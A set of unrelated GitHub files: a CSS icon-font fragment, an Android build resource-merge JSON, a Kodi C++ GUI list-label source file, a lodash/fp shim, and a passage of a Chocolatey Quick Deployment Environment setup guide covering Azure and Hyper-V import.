*/ .icon.package:before { content: '\f0c4'} /*  */ .icon.paintcan:before { content: '\f0d1'} /*  */ .icon.pencil:before { content: '\f058'} /*  */ .icon.person.add:before, .icon.person.follow:before, .icon.person:before { content: '\f018'} /*  */ .icon.pin:before { content: '\f041'} /*  */ .icon.playback.fast.forward:before { content: '\f0bd'} /*  */ .icon.playback.pause:before { content: '\f0bb'} /*  */ .icon.playback.play:before { content: '\f0bf'} /*  */ .icon.playback.rewind:before { content: '\f0bc'} /*  */ .icon.plug:before { 
content: '\f0d4'} /*  */ .icon.repo.create:before, .icon.gist.new:before, .icon.file.directory.create:before, .icon.file.add:before, .icon.plus:before { content: '\f05d'} /*  */ .icon.podium:before { content: '\f0af'} /*  */ .icon.primitive.dot:before { content: '\f052'} /*  */ .icon.primitive.square:before { content: '\f053'} /*  */ .icon.pulse:before { content: '\f085'} /*  */ .icon.puzzle:before { content: '\f0c0'} /*  */ .icon.question:before { content: '\f02c'} /*  */ .icon.quote:before { content: '\f063'} /*  */ .icon.radio.tower:before { content: '\f030'} /*  */ .icon.repo.delete:before, .icon.repo:before { content: '\f001'} /*  */ .icon.repo.clone:before { content: '\f04c'} /*  */ .icon.repo.force.push:before { content: '\f04a'} /*  */ .icon.gist.fork:before, .icon.repo.forked:before { content: '\f002'} /*  */ .icon.repo.pull:before { content: '\f006'} /*  */ .icon.repo.push:before { content: '\f005'} /*  */ .icon.rocket:before { content: '\f033'} /*  */ .icon.rss:before { content: '\f034'} /*  */ .icon.ruby:before { content: '\f047'} /*  */ .icon.screen.full:before { content: '\f066'} /*  */ .icon.screen.normal:before { content: '\f067'} /*  */ .icon.search.save:before, .icon.search:before { content: '\f02e'} /*  */ .icon.server:before { content: '\f097'} /*  */ .icon.settings:before { content: '\f07c'} /*  */ .icon.log.in:before, .icon.sign.in:before { content: '\f036'} /*  */ .icon.log.out:before, .icon.sign.out:before { content: '\f032'} /*  */ .icon.split:before { content: '\f0c6'} /*  */ .icon.squirrel:before { content: '\f0b2'} /*  */ .icon.star.add:before, .icon.star.delete:before, .icon.star:before { content: '\f02a'} /*  */ .icon.steps:before { content: '\f0c7'} /*  */ .icon.stop:before { content: '\f08f'} /*  */ .icon.repo.sync:before, .icon.sync:before { content: '\f087'} /*  */ .icon.tag.remove:before, .icon.tag.add:before, .icon.tag:before { content: '\f015'} /*  */ .icon.telescope:before { content: '\f088'} /*  */ .icon.terminal:before { content: '\f0c8'} /*  */ .icon.three.bars:before { content: '\f05e'} /*  */ .icon.thumbsdown:before { content: '\f0db'} /*  */ .icon.thumbsup:before { content: '\f0da'} /*  */ .icon.tools:before { content: '\f031'} /*  */ .icon.trashcan:before { content: '\f0d0'} /*  */ .icon.triangle.down:before { content: '\f05b'} /*  */ .icon.triangle.left:before { content: '\f044'} /*  */ .icon.triangle.right:before { content: '\f05a'} /*  */ .icon.triangle.up:before { content: '\f0aa'} /*  */ .icon.unfold:before { content: '\f039'} /*  */ .icon.unmute:before { content: '\f0ba'} /*  */ .icon.versions:before { content: '\f064'} /*  */ .icon.remove.close:before, .icon.x:before { content: '\f081'} /*  */ .icon.zap:before { content: '\26A1'} /* ⚡ */
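/* Illustrative markup for the rules above (a sketch only, not part of this
   stylesheet): an element carrying all of a rule's class names renders the
   glyph, e.g. <i class="icon alert"></i> or <i class="icon chevron down"></i>. */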
{ "pile_set_name": "Github" }
[ { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_tile_bg.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_tile_bg.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xxhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xxhdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-v21_notification_action_background.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-v21\\notification_action_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_template_custom_big.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_template_custom_big.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_icon_group.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_icon_group.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_action.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_action.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_action.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_action.xml" }, { 
"merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_bg_low.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_bg_low.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_action_tombstone.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_action_tombstone.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_part_time.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_part_time.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-mdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-mdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v16_notification_template_custom_big.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v16\\notification_template_custom_big.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_icon_background.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_icon_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_custom_dialog.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\custom_dialog.xml" }, { "merged": 
"C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_bg.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_bg.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_launch_background.xml.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\drawable\\launch_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xhdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-hdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-hdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_action_tombstone.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_action_tombstone.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_part_chronometer.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_part_chronometer.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": 
"C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_template_icon_group.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_template_icon_group.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xxxhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xxxhdpi\\ic_launcher.png" } ]
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2013 Team XBMC * http://xbmc.org * * This Program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This Program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with XBMC; see the file COPYING. If not, see * <http://www.gnu.org/licenses/>. * */ #include "GUIListLabel.h" #include <limits> #include "addons/Skin.h" CGUIListLabel::CGUIListLabel(int parentID, int controlID, float posX, float posY, float width, float height, const CLabelInfo& labelInfo, const CGUIInfoLabel &info, CGUIControl::GUISCROLLVALUE scroll) : CGUIControl(parentID, controlID, posX, posY, width, height) , m_label(posX, posY, width, height, labelInfo, (scroll == CGUIControl::ALWAYS) ? CGUILabel::OVER_FLOW_SCROLL : CGUILabel::OVER_FLOW_TRUNCATE) , m_info(info) { m_scroll = scroll; if (g_SkinInfo && g_SkinInfo->APIVersion() < ADDON::AddonVersion("5.1.0")) { if (labelInfo.align & XBFONT_RIGHT) m_label.SetMaxRect(m_posX - m_width, m_posY, m_width, m_height); else if (labelInfo.align & XBFONT_CENTER_X) m_label.SetMaxRect(m_posX - m_width*0.5f, m_posY, m_width, m_height); } if (m_info.IsConstant()) SetLabel(m_info.GetLabel(m_parentID, true)); ControlType = GUICONTROL_LISTLABEL; } CGUIListLabel::~CGUIListLabel(void) { } void CGUIListLabel::SetScrolling(bool scrolling) { if (m_scroll == CGUIControl::FOCUS) m_label.SetScrolling(scrolling); else m_label.SetScrolling((m_scroll == CGUIControl::ALWAYS) ? true : false); } void CGUIListLabel::SetSelected(bool selected) { if(m_label.SetColor(selected ? CGUILabel::COLOR_SELECTED : CGUILabel::COLOR_TEXT)) SetInvalid(); } void CGUIListLabel::SetFocus(bool focus) { CGUIControl::SetFocus(focus); if (!focus) SetScrolling(false); } CRect CGUIListLabel::CalcRenderRegion() const { return m_label.GetRenderRect(); } const CRect CGUIListLabel::GetSelectionRenderRect() { return m_label.GetRenderRect(); } bool CGUIListLabel::UpdateColors() { bool changed = CGUIControl::UpdateColors(); changed |= m_label.UpdateColors(); return changed; } void CGUIListLabel::Process(unsigned int currentTime, CDirtyRegionList &dirtyregions) { if (m_label.Process(currentTime)) MarkDirtyRegion(); CGUIControl::Process(currentTime, dirtyregions); } void CGUIListLabel::Render() { m_label.Render(); CGUIControl::Render(); } void CGUIListLabel::UpdateInfo(const CGUIListItem *item) { if (m_info.IsConstant() && !m_bInvalidated) return; // nothing to do if (item) SetLabel(m_info.GetItemLabel(item)); else SetLabel(m_info.GetLabel(m_parentID, true)); } void CGUIListLabel::SetInvalid() { m_label.SetInvalid(); CGUIControl::SetInvalid(); } void CGUIListLabel::SetWidth(float width) { m_width = width; if (m_label.GetLabelInfo().align & XBFONT_RIGHT) m_label.SetMaxRect(m_posX - m_width, m_posY, m_width, m_height); else if (m_label.GetLabelInfo().align & XBFONT_CENTER_X) m_label.SetMaxRect(m_posX - m_width*0.5f, m_posY, m_width, m_height); else m_label.SetMaxRect(m_posX, m_posY, m_width, m_height); CGUIControl::SetWidth(m_width); } void CGUIListLabel::SetLabel(const std::string &label) { m_label.SetText(label); }
{ "pile_set_name": "Github" }
var convert = require('./convert'), func = convert('lt', require('../lt')); func.placeholder = require('./placeholder'); module.exports = func;
{ "pile_set_name": "Github" }
# Quick Deployment Environment Setup

> :memo: **NOTE**
>
> This document is for **Version 1** of the Quick Deployment Environment.
> If you're using a newer version of QDE, please refer to the [[newer QDE Setup page|QuickDeploymentSetup]].

This document contains instructions for importing the QuickDeploy appliance/VM, or creating a VM and attaching the QuickDeploy disk image to it.

You will receive a download link via email for an archive of the VM image. Once you have this downloaded, it will be ready for extraction and import into your environment.

> :warning: **WARNING**
>
> Please follow these steps in ***exact*** order. These will be very important later when you are trying to use the environment.

<!-- TOC depthFrom:2 -->

- [Step 0: Setup Considerations](#step-0-setup-considerations)
  - [Step 0.1: QDE Rename Considerations](#step-01-qde-rename-considerations)
- [Step 1: Import Virtual Environment](#step-1-import-virtual-environment)
  - [Platform: Azure](#platform-azure)
  - [Platform: Hyper-V (Appliance)](#platform-hyper-v-appliance)
  - [Platform: Hyper-V (VHD file)](#platform-hyper-v-vhd-file)
  - [Platform: VMware (VMDK file)](#platform-vmware-vmdk-file)
  - [Platform: VMware (OVF template)](#platform-vmware-ovf-template)
  - [Platform: Other](#platform-other)
- [Step 2: Other Considerations for Virtual Environment](#step-2-other-considerations-for-virtual-environment)
  - [Step 2.1: DNS Settings](#step-21-dns-settings)
- [Step 3: Virtual Environment Setup](#step-3-virtual-environment-setup)
  - [Step 3.1: Expand Disk Size](#step-31-expand-disk-size)
  - [Step 3.2: Add License File to QDE](#step-32-add-license-file-to-qde)
  - [Step 3.3: Regenerate SSL Certificates](#step-33-regenerate-ssl-certificates)
  - [Step 3.4: Database Password Changes (Optional)](#step-34-database-password-changes-optional)
- [Step 4: Firewall Changes](#step-4-firewall-changes)
- [Step 5: Install and Configure Chocolatey on Clients](#step-5-install-and-configure-chocolatey-on-clients)
- [FAQ](#faq)
  - [How do I upgrade QDE?](#how-do-i-upgrade-qde)

<!-- /TOC -->
___

## Step 0: Setup Considerations

The following are points to keep in mind during initial setup:

* You will need access to AWS to download the environment (specifically `s3.amazonaws.com`).
* Hostname/FQDN changes will invalidate all scripts and certificates. Thus, if you plan to change the hostname, you must do so prior to running any setup scripts. If you run into issues, refer to the README file on the desktop of the VM.
* Self-signed certificates are generated by default. If you plan to use your own certificates, please reach out to Support for assistance.
* The back-end database is configured with no outbound connections - if you plan to change this, please reach out to Support for assistance.
* If you intend to use Nexus outside of your corporate network without the use of a VPN, you will be required to configure RBAC on the repositories housed inside of the repository server. This is to ensure that the packages stored on the server are not publicly accessible without authentication.

### Step 0.1: QDE Rename Considerations

> :warning: **WARNING**
>
> tl;dr: Think long and hard before changing the QDE hostname
>
> Renaming the QDE host requires a number of changes and must be completed FIRST, before ANYTHING else is done on the QDE box. It is strongly recommended **NOT** to rename unless you absolutely need to. The most important reason has to do with how a client installs from QDE - it must learn to trust the QDE certificate.
> Once renamed, the easy option that's provided for you goes away and you will need to provide a hosted solution with an already trusted certificate.
> You can provide your own certificate that is already trusted on machines as part of the [[SSL/TLS Setup|QuickDeploymentSslSetup]]. Your other option is to host the script to trust the certificate with an already trusted certificate. You will find a template that you will need to edit at `c:\choco_setup_files` (in the QDE) named `Import-ChocoServerCertificate.ps1`.
>
> Please contact support if you need help here.

If you rename the QDE Environment, here's a small list of things you'll need to do:

1. Update scripts in Nexus that are currently pointed to the default QDE name.
1. Regenerate SSL Certificates.
1. Deploy the Nexus SSL Certificate public key to the clients (there is a helper method for this, but it only works if the box is not renamed and is limited to the default name for security purposes). See `c:\choco_setup_files\Import-ChocoServerCertificate.ps1` for an example of what we mean.
1. There may be more places impacted. Check with support to ensure all is good to go.

___

## Step 1: Import Virtual Environment

Choose one of the following methods based on what your hypervisor environment supports.

### Platform: Azure

If you choose to use the scripts provided inside the Zip archive, there are a number of pre-requisites that are needed:

* The Hyper-V PowerShell module is required.
  * For Windows 10, run `Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Management-PowerShell` from an elevated PowerShell prompt.
  * For Windows Server 2012 and later, run `Install-WindowsFeature -Name Hyper-V-PowerShell` from an elevated PowerShell prompt.
* Having both the `Az` and `AzureRm` PowerShell modules installed is not [supported](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-4.3.0#install-the-azure-powershell-module). You can see if you have `AzureRm` installed by running `Get-Module -Name AzureRm -ListAvailable`. If there is no output, it is not installed.
* Install the `Az` PowerShell module. To find out if you have the module installed, run `Get-Module -Name Az -ListAvailable` from an elevated PowerShell session.
  * To install the `Az` module using Chocolatey, run `choco install az.powershell -y`.
  * Using PowerShell: `Install-Module -Name Az -AllowClobber -Scope CurrentUser`.
* For the Azure PowerShell module you will need _either_ PowerShell 5.1 and .NET 4.7.2 **or** PowerShell Core installed:
  * PowerShell 5.1 and .NET 4.7.2:
    * You can find out the current version of PowerShell you are running using the command `$PSVersionTable.PSVersion` from a PowerShell session.
    * To install PowerShell 5.1, use Chocolatey by running `choco install powershell -y` or see [Microsoft Docs](https://docs.microsoft.com/en-us/powershell/scripting/windows-powershell/install/installing-windows-powershell?view=powershell-7#upgrading-existing-windows-powershell).
    * To install .NET 4.7.2, use Chocolatey by running `choco install dotnet4.7.2 -y` or see the [Microsoft docs](https://docs.microsoft.com/en-us/dotnet/framework/install/).
  * PowerShell Core:
    * To install PowerShell Core, use Chocolatey by running `choco install powershell-core -y` or see the [Microsoft Docs](https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-windows?view=powershell-7).
* AzCopy v10 or later - this is needed to copy the disk to Azure. To find out if you have `azcopy` installed and which version, run `azcopy --version`.
  * To install AzCopy v10 or later using Chocolatey, run `choco install azcopy10 -y` or see the [Microsoft Docs](https://docs.microsoft.com/en-us/azure/storage/common/storage-use-azcopy-v10#download-and-install-azcopy).
* The scripts provided with the QDE virtual machine disk image have defaults that you need to ensure you are comfortable with, as well as extensive help. You can see the help, and the defaults, by running `Get-Help <SCRIPT-NAME> -full`.
* The scripts will create resources in Azure which will cost you real money. Please ensure you are comfortable with this before continuing. See above to get help with the scripts.
* The execution policy must allow running scripts. If it does not, you can set it _for the current PowerShell session_ by running `Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process`.
* Any code or scripts must be run in an _elevated_ PowerShell session.

Steps to create a QDE virtual machine in Azure:

1. Download the Zip archive containing the Azure virtual machine disk (VHD), and unzip it to the directory you wish to store it in. You should have three files:
   * `QuickDeployEnvironment-Azure.vhd`
   * `Set-QDEAzureDisk.ps1`
   * `New-QDEAzureVM.ps1`
2. While the scripts will do the majority of the hard work needed to create a QDE virtual machine in Azure, we do need to set up a resource group. The default resource group that the scripts will use is `qdeserver-resgrp`; however, you can supply an existing resource group using the `-ResourceGroupName <YOUR-RESOURCEGROUPNAME>` parameter. To create a resource group, run `New-AzResourceGroup -Name <RESOURCEGROUPNAME> -Location <YOUR-AZURE-LOCATION>`.
3. We need to convert the disk you have downloaded to the size required, and then upload it to Azure so we can attach it to the QDE virtual machine we will create in the following steps. Note that the script we are about to run contains defaults that should work for the majority of users. However, please run `Get-Help Set-QDEAzureDisk.ps1 -full` to get help on the parameters you can provide and the defaults that have been set. Once you are comfortable, in the directory you extracted the files to, run `.\Set-QDEAzureDisk.ps1 -Verbose <PARAMETERS>` (where `<PARAMETERS>` is any parameters you want to provide). Providing the `-Verbose` switch produces output on the screen. Note that the processes of converting the disk and uploading it can take a long time.
4. Before we connect to the QDE virtual machine in Azure, we must reset the password. To create a password we can provide to the next script, run `$qdePwd = '<YOUR-PASSWORD>' | ConvertTo-SecureString -AsPlainText -Force` (where `<YOUR-PASSWORD>` is the password you want to set **and is longer than 12 characters**).
5. Once the disk has been uploaded, we need to create the QDE virtual machine in Azure and attach the disk we uploaded as the operating system disk. Note that the script we are about to run contains defaults that should work for the majority of users. However, please run `Get-Help New-QDEAzureVM.ps1 -full` to get help on the parameters you can provide and the defaults that have been set. Once you are comfortable, in the directory you extracted the files to, run `.\New-QDEAzureVM.ps1 -Verbose -AdministratorComplexPassword $qdePwd <PARAMETERS>` (where `<PARAMETERS>` is any parameters you want to provide and `$qdePwd` is the password we created in the previous step). Providing the `-Verbose` switch produces output on the screen.
6. Once this is complete, the script will output the command you can run to connect to the virtual machine, including the IP address (if you are using the `-Verbose` switch). Use `mstsc.exe /v:<IP-ADDRESS>` to connect, and log in with the password you created in a previous step.

### Platform: Hyper-V (Appliance)

1. Download the zip archive containing the Hyper-V VM directory structure, and unzip it to the directory you wish to store it in.
2. Open Hyper-V Manager, select `Import Virtual Machine` from the right sidebar (or Action menu), and choose the folder you extracted from the above archive (e.g. ChocoServer).
3. Increase the size of the VHD, for example, to 500GB. Increase to what you feel comfortable with.

   ```powershell
   # This only increases the available size of the image
   # You will still need to increase the space for the C drive
   Resize-VHD -Path 'C:\path\to\QuickDeploy Environment.vhd' -Size 500GB
   ```

